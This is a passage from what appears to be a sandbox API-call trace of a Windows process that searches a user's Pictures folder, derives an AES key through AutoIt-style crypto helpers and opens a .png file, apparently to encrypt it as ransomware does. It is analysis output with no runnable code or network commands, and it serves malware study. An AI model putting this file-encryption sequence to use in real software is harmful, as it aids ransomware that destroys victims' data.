dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.577] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.577] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.577] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.577] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b34ee0, ftCreationTime.dwHighDateTime=0x1d5b629, ftLastAccessTime.dwLowDateTime=0x3a866ae0, ftLastAccessTime.dwHighDateTime=0x1d5c4da, ftLastWriteTime.dwLowDateTime=0x3a866ae0, ftLastWriteTime.dwHighDateTime=0x1d5c4da, nFileSizeHigh=0x0, nFileSizeLow=0x11cf8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Skh73R.png", cAlternateFileName="")) returned 0x7c20c0 [0041.578] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.578] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.578] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b34ee0, ftCreationTime.dwHighDateTime=0x1d5b629, ftLastAccessTime.dwLowDateTime=0x3a866ae0, ftLastAccessTime.dwHighDateTime=0x1d5c4da, ftLastWriteTime.dwLowDateTime=0x3a866ae0, ftLastWriteTime.dwHighDateTime=0x1d5c4da, nFileSizeHigh=0x0, nFileSizeLow=0x11cf8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Skh73R.png", cAlternateFileName="")) returned 0x7c20c0 [0041.578] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.578] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Skh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kh73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h73R.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.579] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.579] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.579] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.579] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.580] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.580] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.580] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.580] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.580] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b34ee0, ftCreationTime.dwHighDateTime=0x1d5b629, ftLastAccessTime.dwLowDateTime=0x3a866ae0, ftLastAccessTime.dwHighDateTime=0x1d5c4da, ftLastWriteTime.dwLowDateTime=0x3a866ae0, ftLastWriteTime.dwHighDateTime=0x1d5c4da, nFileSizeHigh=0x0, nFileSizeLow=0x11cf8, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Skh73R.png", cAlternateFileName="")) returned 0x7c2100 [0041.580] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.580] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.581] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.581] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0041.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.582] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.582] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.582] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.582] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.583] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.583] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.583] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0041.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.583] CryptDestroyHash (hHash=0x7c2240) returned 1 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\skh73r.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.585] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.585] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.585] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.586] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.586] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.586] HeapFree (in: 